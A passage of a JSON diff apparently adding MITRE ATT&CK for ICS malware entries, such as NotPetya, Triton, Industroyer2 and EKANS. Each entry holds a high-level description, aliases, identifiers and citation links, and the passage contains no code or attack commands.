"description": "Joel Langill. (2014, January 21). Stuxnet Mitigation. Retrieved October 22, 2019.", + "url": "https://scadahacker.com/resources/stuxnet-mitigation.html" + }, + { + "source_name": "Langer Stuxnet Analysis Nov 2013", + "description": "Ralph Langner. (2013, November). To Kill a Centrifuge: A Technical Analysis of What Stuxnet's Creators Tried to Achieve. Retrieved March 27, 2018.", + "url": "https://www.langner.com/wp-content/uploads/2017/03/to-kill-a-centrifuge.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": true + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_aliases": [ + "Conficker", + "Downadup", + "Kido" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "name": "Conficker", + "description": "[Conficker](https://collaborate.mitre.org/attackics/index.php/Software/S0012) is a computer worm that targets Microsoft Windows and was first detected in November 2008. It targets a vulnerability (MS08-067) in Windows OS software and dictionary attacks on administrator passwords to propagate while forming a botnet. Conficker made its way onto computers and removable disk drives in a nuclear power plant. (Citation: Malware Shuts Down German Nuclear Power Plant on Chernobyl's 30th Anniversary)", + "type": "malware", + "x_mitre_version": "1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "id": "malware--49c04994-1035-4b58-89b7-cf8956e3b423", + "created": "2017-05-31T21:32:59.661Z", + "modified": "2021-10-21T14:00:00.188Z", + "external_references": [ + { + "external_id": "S1003", + "source_name": "mitre-ics-attack", + "url": "https://collaborate.mitre.org/attackics/index.php/Software/S0012" + }, + { + "description": "Catalin Cimpanu. (2016, April 26). Malware Shuts Down German Nuclear Power Plant on Chernobyl's 30th Anniversary. Retrieved October 14, 2019.", + "source_name": "Malware Shuts Down German Nuclear Power Plant on Chernobyl's 30th Anniversary", + "url": "https://news.softpedia.com/news/on-chernobyl-s-30th-anniversary-malware-shuts-down-german-nuclear-power-plant-503429.shtml" + }, + { + "description": "Symantec. (2015, June 30). Simple steps to protect yourself from the Conficker Worm. Retrieved December 5, 2019.", + "source_name": "Symantec Conficker Jun 2015", + "url": "https://support.symantec.com/us/en/article.tech93179.html" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": true + }, + { + "modified": "2022-10-12T17:59:55.276Z", + "name": "PLC-Blaster", + "description": "[PLC-Blaster](https://attack.mitre.org/software/S1006) is a piece of proof-of-concept malware that runs on Siemens S7 PLCs. This worm locates other Siemens S7 PLCs on the network and attempts to infect them. Once this worm has infected its target and attempted to infect other devices on the network, the worm can then run one of many modules. (Citation: Spenneberg, Ralf, Maik Brggemann, and Hendrik Schwartke March 2016) (Citation: Spenneberg, Ralf 2016) ", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_aliases": [ + "PLC-Blaster" + ], + "type": "malware", + "id": "malware--4dcff507-5af8-47ce-964a-8d9569e9ccfe", + "created": "2019-03-26T15:02:14.907Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S1006", + "external_id": "S1006" + }, + { + "source_name": "Spenneberg, Ralf 2016", + "description": "Spenneberg, Ralf 2016 PLC-Blaster Retrieved. 2019/06/06 ", + "url": "https://www.blackhat.com/docs/asia-16/materials/asia-16-Spenneberg-PLC-Blaster-A-Worm-Living-Solely-In-The-PLC.pdf" + }, + { + "source_name": "Spenneberg, Ralf, Maik Brggemann, and Hendrik Schwartke March 2016", + "description": "Spenneberg, Ralf, Maik Brggemann, and Hendrik Schwartke 2016, March 31 Plc-blaster: A worm living solely in the plc. Retrieved. 2017/09/19 ", + "url": "https://www.blackhat.com/docs/asia-16/materials/asia-16-Spenneberg-PLC-Blaster-A-Worm-Living-Solely-In-The-PLC-wp.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-10-12T17:33:00.482Z", + "name": "BlackEnergy", + "description": "[BlackEnergy](https://attack.mitre.org/software/S0089) is a malware toolkit that has been used by both criminal and APT actors. It dates back to at least 2007 and was originally designed to create botnets for use in conducting Distributed Denial of Service (DDoS) attacks, but its use has evolved to support various plug-ins. It is well known for being used during the confrontation between Georgia and Russia in 2008, as well as in targeting Ukrainian institutions. Variants include BlackEnergy 2 and BlackEnergy 3. (Citation: F-Secure BlackEnergy 2014)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_version": "1.3", + "x_mitre_aliases": [ + "BlackEnergy", + "Black Energy" + ], + "type": "malware", + "id": "malware--54cc1d4f-5c53-4f0e-9ef5-11b4998e82e4", + "created": "2017-05-31T21:32:57.807Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0089", + "external_id": "S0089" + }, + { + "source_name": "F-Secure BlackEnergy 2014", + "description": "F-Secure Labs. (2014). BlackEnergy & Quedagh: The convergence of crimeware and APT attacks. Retrieved March 24, 2016.", + "url": "https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-08T22:11:21.842Z", + "name": "NotPetya", + "description": "[NotPetya](https://attack.mitre.org/software/S0368) is malware that was used by [Sandworm Team](https://attack.mitre.org/groups/G0034) in a worldwide attack starting on June 27, 2017. While [NotPetya](https://attack.mitre.org/software/S0368) appears as a form of ransomware, its main purpose was to destroy data and disk structures on compromised systems; the attackers never intended to make the encrypted data recoverable. As such, [NotPetya](https://attack.mitre.org/software/S0368) may be more appropriately thought of as a form of wiper malware. [NotPetya](https://attack.mitre.org/software/S0368) contains worm-like features to spread itself across a computer network using the SMBv1 exploits EternalBlue and EternalRomance.(Citation: Talos Nyetya June 2017)(Citation: US-CERT NotPetya 2017)(Citation: ESET Telebots June 2017)(Citation: US District Court Indictment GRU Unit 74455 October 2020)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_version": "2.0", + "x_mitre_aliases": [ + "NotPetya", + "ExPetr", + "Diskcoder.C", + "GoldenEye", + "Petrwrap", + "Nyetya" + ], + "type": "malware", + "id": "malware--5719af9d-6b16-46f9-9b28-fb019541ddbb", + "created": "2019-03-26T15:02:14.907Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0368", + "external_id": "S0368" + }, + { + "source_name": "ExPetr", + "description": "(Citation: ESET Telebots June 2017)" + }, + { + "source_name": "Diskcoder.C", + "description": "(Citation: ESET Telebots June 2017)" + }, + { + "source_name": "GoldenEye", + "description": "(Citation: Talos Nyetya June 2017)" + }, + { + "source_name": "Nyetya", + "description": "(Citation: Talos Nyetya June 2017)" + }, + { + "source_name": "Petrwrap", + "description": "(Citation: Talos Nyetya June 2017)(Citation: ESET Telebots June 2017)" + }, + { + "source_name": "ESET Telebots June 2017", + "description": "Cherepanov, A.. (2017, June 30). TeleBots are back: Supply chain attacks against Ukraine. Retrieved June 11, 2020.", + "url": "https://www.welivesecurity.com/2017/06/30/telebots-back-supply-chain-attacks-against-ukraine/" + }, + { + "source_name": "Talos Nyetya June 2017", + "description": "Chiu, A. (2016, June 27). New Ransomware Variant \"Nyetya\" Compromises Systems Worldwide. Retrieved March 26, 2019.", + "url": "https://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html" + }, + { + "source_name": "US District Court Indictment GRU Unit 74455 October 2020", + "description": "Scott W. Brady. (2020, October 15). United States vs. Yuriy Sergeyevich Andrienko et al.. Retrieved November 25, 2020.", + "url": "https://www.justice.gov/opa/press-release/file/1328521/download" + }, + { + "source_name": "US-CERT NotPetya 2017", + "description": "US-CERT. (2017, July 1). Alert (TA17-181A): Petya Ransomware. Retrieved March 15, 2019.", + "url": "https://www.us-cert.gov/ncas/alerts/TA17-181A" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-08T22:15:47.458Z", + "name": "Conficker", + "description": "[Conficker](https://attack.mitre.org/software/S0608) is a computer worm first detected in October 2008 that targeted Microsoft Windows using the MS08-067 Windows vulnerability to spread.(Citation: SANS Conficker) In 2016, a variant of [Conficker](https://attack.mitre.org/software/S0608) made its way on computers and removable disk drives belonging to a nuclear power plant.(Citation: Conficker Nuclear Power Plant)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_aliases": [ + "Conficker", + "Kido", + "Downadup" + ], + "type": "malware", + "id": "malware--58eddbaf-7416-419a-ad7b-e65b9d4c3b55", + "created": "2021-02-23T20:50:32.845Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0608", + "external_id": "S0608" + }, + { + "source_name": "Kido", + "description": "(Citation: SANS Conficker) " + }, + { + "source_name": "Downadup", + "description": "(Citation: SANS Conficker) " + }, + { + "source_name": "SANS Conficker", + "description": "Burton, K. (n.d.). The Conficker Worm. Retrieved February 18, 2021.", + "url": "https://web.archive.org/web/20200125132645/https://www.sans.org/security-resources/malwarefaq/conficker-worm" + }, + { + "source_name": "Conficker Nuclear Power Plant", + "description": "Cimpanu, C. (2016, April 26). Malware Shuts Down German Nuclear Power Plant on Chernobyl's 30th Anniversary. Retrieved February 18, 2021.", + "url": "https://news.softpedia.com/news/on-chernobyl-s-30th-anniversary-malware-shuts-down-german-nuclear-power-plant-503429.shtml" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-08T22:03:50.370Z", + "name": "LockerGoga", + "description": "[LockerGoga](https://attack.mitre.org/software/S0372) is ransomware that was first reported in January 2019, and has been tied to various attacks on European companies, including industrial and manufacturing firms.(Citation: Unit42 LockerGoga 2019)(Citation: CarbonBlack LockerGoga 2019)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_version": "2.0", + "x_mitre_contributors": [ + "Joe Slowik - Dragos" + ], + "x_mitre_aliases": [ + "LockerGoga" + ], + "type": "malware", + "id": "malware--5af7a825-2d9f-400d-931a-e00eb9e27f48", + "created": "2019-04-16T19:00:49.435Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0372", + "external_id": "S0372" + }, + { + "source_name": "CarbonBlack LockerGoga 2019", + "description": "CarbonBlack Threat Analysis Unit. (2019, March 22). TAU Threat Intelligence Notification – LockerGoga Ransomware. Retrieved April 16, 2019.", + "url": "https://www.carbonblack.com/2019/03/22/tau-threat-intelligence-notification-lockergoga-ransomware/" + }, + { + "source_name": "Unit42 LockerGoga 2019", + "description": "Harbison, M. (2019, March 26). Born This Way? Origins of LockerGoga. Retrieved April 16, 2019.", + "url": "https://unit42.paloaltonetworks.com/born-this-way-origins-of-lockergoga/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-10-12T18:30:51.174Z", + "name": "VPNFilter", + "description": "[VPNFilter](https://attack.mitre.org/software/S1010) is a multi-stage, modular platform with versatile capabilities to support both intelligence-collection and destructive cyber attack operations. [VPNFilter](https://attack.mitre.org/software/S1010) modules such as its packet sniffer ('ps') can collect traffic that passes through an infected device, allowing the theft of website credentials and monitoring of Modbus SCADA protocols. (Citation: William Largent June 2018) (Citation: Carl Hurd March 2019)", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_aliases": [ + "VPNFilter" + ], + "type": "malware", + "id": "malware--6108f800-10b8-4090-944e-be579f01263d", + "created": "2019-03-26T15:02:14.907Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S1010", + "external_id": "S1010" + }, + { + "source_name": "Carl Hurd March 2019", + "description": "Carl Hurd 2019, March 26 VPNFilter Deep Dive Retrieved. 2019/03/28 ", + "url": "https://www.youtube.com/watch?v=yuZazP22rpI" + }, + { + "source_name": "William Largent June 2018", + "description": "William Largent 2018, June 06 VPNFilter Update - VPNFilter exploits endpoints, targets new devices Retrieved. 2019/03/28 ", + "url": "https://blog.talosintelligence.com/2018/06/vpnfilter-update.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-08T22:17:50.971Z", + "name": "Duqu", + "description": "[Duqu](https://attack.mitre.org/software/S0038) is a malware platform that uses a modular approach to extend functionality after deployment within a target network. (Citation: Symantec W32.Duqu)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_version": "1.2", + "x_mitre_aliases": [ + "Duqu" + ], + "type": "malware", + "id": "malware--68dca94f-c11d-421e-9287-7c501108e18c", + "created": "2017-05-31T21:32:31.188Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0038", + "external_id": "S0038" + }, + { + "source_name": "Symantec W32.Duqu", + "description": "Symantec Security Response. (2011, November). W32.Duqu: The precursor to the next Stuxnet. Retrieved September 17, 2015.", + "url": "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_duqu_the_precursor_to_the_next_stuxnet.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-04-06T22:00:22.774Z", + "name": "Industroyer2", + "description": "[Industroyer2](https://attack.mitre.org/software/S1072) is a compiled and static piece of malware that has the ability to communicate over the IEC-104 protocol. It is similar to the IEC-104 module found in [Industroyer](https://attack.mitre.org/software/S0604). Security researchers assess that [Industroyer2](https://attack.mitre.org/software/S1072) was designed to cause impact to high-voltage electrical substations. The initial [Industroyer2](https://attack.mitre.org/software/S1072) sample was compiled on 03/23/2022 and scheduled to execute on 04/08/2022, however it was discovered before deploying, resulting in no impact.(Citation: Industroyer2 Blackhat ESET)", + "x_mitre_platforms": [ + "Field Controller/RTU/PLC/IED", + "Engineering Workstation" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack", + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_aliases": [ + "Industroyer2" + ], + "type": "malware", + "id": "malware--6a0d0ea9-b2c4-43fe-a552-ac41a3009dc5", + "created": "2023-03-30T19:20:45.556Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S1072", + "external_id": "S1072" + }, + { + "source_name": "Industroyer2 Blackhat ESET", + "description": "Anton Cherepanov, Robert Lipovsky. (2022, August). Industroyer2: Sandworm's Cyberwarfare Targets Ukraine's Power Grid. Retrieved April 6, 2023.", + "url": "https://www.youtube.com/watch?v=xC9iM5wVedQ" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_aliases": [ + "Killdisk" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "name": "Killdisk", + "description": "In 2015 the BlackEnergy malware contained a component called KillDisk. KillDisk's main functionality is to overwrite files with random data, rendering the OS unbootable. (Citation: ESET BlackEnergy Jan 2016)", + "id": "malware--736a3b71-eccc-48b7-b5ed-adb2b74ca830", + "type": "malware", + "x_mitre_version": "1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31T21:33:21.973Z", + "modified": "2021-10-21T14:00:00.188Z", + "external_references": [ + { + "external_id": "S1005", + "source_name": "mitre-ics-attack", + "url": "https://collaborate.mitre.org/attackics/index.php/Software/S0016" + }, + { + "source_name": "ESET BlackEnergy Jan 2016", + "description": "Anton Cherepanov. (n.d.). BlackEnergy by the SSHBearDoor: attacks against Ukrainian news media and electric industry. Retrieved October 29, 2019.", + "url": "https://www.welivesecurity.com/2016/01/03/blackenergy-sshbeardoor-details-2015-attacks-ukrainian-news-media-electric-industry/" + }, + { + "source_name": "Booz Allen Hamilton", + "description": "Booz Allen Hamilton. (n.d.). When The Lights Went Out. Retrieved October 22, 2019.", + "url": "https://www.boozallen.com/content/dam/boozallen/documents/2016/09/ukraine-report-when-the-lights-went-out.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": true + }, + { + "modified": "2023-03-08T22:20:20.868Z", + "name": "WannaCry", + "description": "[WannaCry](https://attack.mitre.org/software/S0366) is ransomware that was first seen in a global attack during May 2017, which affected more than 150 countries. It contains worm-like features to spread itself across a computer network using the SMBv1 exploit EternalBlue.(Citation: LogRhythm WannaCry)(Citation: US-CERT WannaCry 2017)(Citation: Washington Post WannaCry 2017)(Citation: FireEye WannaCry 2017)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_contributors": [ + "Jan Miller, CrowdStrike" + ], + "x_mitre_aliases": [ + "WannaCry", + "WanaCry", + "WanaCrypt", + "WanaCrypt0r", + "WCry" + ], + "type": "malware", + "id": "malware--75ecdbf1-c2bb-4afc-a3f9-c8da4de8c661", + "created": "2019-03-25T17:30:17.004Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0366", + "external_id": "S0366" + }, + { + "source_name": "WanaCrypt0r", + "description": "(Citation: LogRhythm WannaCry)" + }, + { + "source_name": "WCry", + "description": "(Citation: LogRhythm WannaCry)(Citation: SecureWorks WannaCry Analysis)" + }, + { + "source_name": "WanaCry", + "description": "(Citation: SecureWorks WannaCry Analysis)" + }, + { + "source_name": "WanaCrypt", + "description": "(Citation: SecureWorks WannaCry Analysis)" + }, + { + "source_name": "FireEye WannaCry 2017", + "description": "Berry, A., Homan, J., and Eitzman, R. (2017, May 23). WannaCry Malware Profile. Retrieved March 15, 2019.", + "url": "https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html" + }, + { + "source_name": "SecureWorks WannaCry Analysis", + "description": "Counter Threat Unit Research Team. (2017, May 18). WCry Ransomware Analysis. Retrieved March 26, 2019.", + "url": "https://www.secureworks.com/research/wcry-ransomware-analysis" + }, + { + "source_name": "Washington Post WannaCry 2017", + "description": "Dwoskin, E. and Adam, K. (2017, May 14). More than 150 countries affected by massive cyberattack, Europol says. Retrieved March 25, 2019.", + "url": "https://www.washingtonpost.com/business/economy/more-than-150-countries-affected-by-massive-cyberattack-europol-says/2017/05/14/5091465e-3899-11e7-9e48-c4f199710b69_story.html?utm_term=.7fa16b41cad4" + }, + { + "source_name": "LogRhythm WannaCry", + "description": "Noerenberg, E., Costis, A., and Quist, N. (2017, May 16). A Technical Analysis of WannaCry Ransomware. Retrieved March 25, 2019.", + "url": "https://logrhythm.com/blog/a-technical-analysis-of-wannacry-ransomware/" + }, + { + "source_name": "US-CERT WannaCry 2017", + "description": "US-CERT. (2017, May 12). Alert (TA17-132A): Indicators Associated With WannaCry Ransomware. Retrieved March 25, 2019.", + "url": "https://www.us-cert.gov/ncas/alerts/TA17-132A" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-11-23T14:27:54.711Z", + "name": "Triton", + "description": "[Triton](https://attack.mitre.org/software/S1009) is an attack framework built to interact with Triconex Safety Instrumented System (SIS) controllers.(Citation: Blake Johnson, Dan Caban, Marina Krotofil, Dan Scali, Nathan Brubaker, Christopher Glyer December 2017)(Citation: Dragos December 2017)(Citation: DHS CISA February 2019)(Citation: Schneider Electric January 2018)(Citation: Julian Gutmanis March 2019)(Citation: Schneider December 2018)(Citation: Jos Wetzels January 2018)", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_aliases": [ + "Triton", + "TRISIS", + "HatMan" + ], + "type": "malware", + "id": "malware--80099a91-4c86-4bea-9ccb-dac55d61960e", + "created": "2019-03-26T15:02:14.907Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S1009", + "external_id": "S1009" + }, + { + "source_name": "Blake Johnson, Dan Caban, Marina Krotofil, Dan Scali, Nathan Brubaker, Christopher Glyer December 2017", + "description": "Blake Johnson, Dan Caban, Marina Krotofil, Dan Scali, Nathan Brubaker, Christopher Glyer 2017, December 14 Attackers Deploy New ICS Attack Framework TRITON and Cause Operational Disruption to Critical Infrastructure Retrieved. 2018/01/12 ", + "url": "https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html" + }, + { + "source_name": "DHS CISA February 2019", + "description": "DHS CISA 2019, February 27 MAR-17-352-01 HatManSafety System Targeted Malware (Update B) Retrieved. 2019/03/08 ", + "url": "https://ics-cert.us-cert.gov/sites/default/files/documents/MAR-17-352-01%20HatMan%20-%20Safety%20System%20Targeted%20Malware%20%28Update%20B%29.pdf" + }, + { + "source_name": "Dragos December 2017", + "description": "Dragos 2017, December 13 TRISIS Malware Analysis of Safety System Targeted Malware Retrieved. 2018/01/12 ", + "url": "https://dragos.com/blog/trisis/TRISIS-01.pdf" + }, + { + "source_name": "Jos Wetzels January 2018", + "description": "Jos Wetzels 2018, January 16 Analyzing the TRITON industrial malware Retrieved. 2019/10/22 ", + "url": "https://www.midnightbluelabs.com/blog/2018/1/16/analyzing-the-triton-industrial-malware" + }, + { + "source_name": "Julian Gutmanis March 2019", + "description": "Julian Gutmanis 2019, March 11 Triton - A Report From The Trenches Retrieved. 2019/03/11 ", + "url": "https://www.youtube.com/watch?v=XwSJ8hloGvY" + }, + { + "source_name": "Schneider December 2018", + "description": "Schneider 2018, December 14 Security Notification EcoStruxure Triconex Tricon V3 Retrieved. 2019/03/08 ", + "url": "https://download.schneider-electric.com/files?p_enDocType=Technical+leaflet&p_File_Name=SEVD-2017-347-01+Triconex+V3.pdf&p_Doc_Ref=SEVD-2017-347-01" + }, + { + "source_name": "Schneider Electric January 2018", + "description": "Schneider Electric 2018, January 23 TRITON - Schneider Electric Analysis and Disclosure Retrieved. 2019/03/14 ", + "url": "https://www.youtube.com/watch?v=f09E75bWvkk&index=3&list=PL8OWO1qWXF4qYG19p7An4Vw3N2YZ86aRS&t=0s" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.0.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_aliases": [ + "BlackEnergy 3" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "name": "BlackEnergy 3", + "description": "[BlackEnergy 3](https://collaborate.mitre.org/attackics/index.php/Software/S0004) is a malware toolkit that has been used by both criminal and APT actors. It support various plug-ins including a variant of KillDisk. It is known to have been used against the Ukrainian power grid. (Citation: Booz Allen Hamilton)", + "type": "malware", + "x_mitre_version": "1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "id": "malware--89ab0ca5-f7e0-4d16-bf2a-17d68117fa4b", + "created": "2017-05-31T21:32:59.661Z", + "modified": "2021-04-29T14:49:39.188Z", + "external_references": [ + { + "external_id": "S1002", + "source_name": "mitre-ics-attack", + "url": "https://collaborate.mitre.org/attackics/index.php/Software/S0004" + }, + { + "description": "Booz Allen Hamilton. (n.d.). When The Lights Went Out. Retrieved October 22, 2019.", + "source_name": "Booz Allen Hamilton", + "url": "https://www.boozallen.com/content/dam/boozallen/documents/2016/09/ukraine-report-when-the-lights-went-out.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": true + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_aliases": [ + "EKANS", + "SNAKEHOSE" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_version": "1.0", + "type": "malware", + "modified": "2021-10-21T14:00:00.188Z", + "created": "2021-04-13T12:28:31.188Z", + "description": "[EKANS](https://collaborate.mitre.org/attackics/index.php/Software/S0017) is ransomware that was first seen December 2019 and later reported to have impacted operations at Honda automotive production facilities.(Citation: Forbes Snake Ransomware June 2020)(Citation: MalwareByes Honda and Enel Ransomware June 2020)(Citation: Dragos EKANS February 2020) EKANS has a hard-coded kill-list of processes, including some associated with common ICS software platforms (e.g., GE Proficy historian, Honeywell HMIWeb).(Citation: Dragos EKANS February 2020) If the malware discovers these processes on the target system, it will stop, encrypt, and rename the process to prevent the program from restarting. This malware should not be confused with the “Snake” malware associated with the Turla group. The ICS processes documented within the malware’s kill-list is similar to those defined by the MEGACORTEX software.(Citation: FireEye OT Ransomware July 2020)(Citation: Pylos January 2020)(Citation: Dragos EKANS June 2020)The ransomware was initially reported as “Snake”, however, to avoid confusion with the unrelated Turla APT group security researchers spelled it backwards as EKANS.", + "external_references": [ + { + "source_name": "mitre-ics-attack", + "external_id": "S0017", + "url": "https://collaborate.mitre.org/attackics/index.php/Software/S0017" + }, + { + "source_name": "Forbes Snake Ransomware June 2020", + "description": "Davey Winder. (2020, June 10). Honda Hacked: Japanese Car Giant Confirms Cyber Attack On Global Operations. Retrieved April 12, 2021.", + "url": "https://www.forbes.com/sites/daveywinder/2020/06/10/honda-hacked-japanese-car-giant-confirms-cyber-attack-on-global-operations-snake-ransomware/?sh=2725c35753ad" + }, + { + "source_name": "MalwareByes Honda and Enel Ransomware June 2020", + "description": "MalwareBytes. (2020, June 09). Honda and Enel impacted by cyber attack suspected to be ransomware. Retrieved April 12, 2021.", + "url": "https://blog.malwarebytes.com/threat-analysis/2020/06/honda-and-enel-impacted-by-cyber-attack-suspected-to-be-ransomware/" + }, + { + "source_name": "Dragos EKANS February 2020", + "description": "Dragos Threat Intelligence. (2020, February 03). 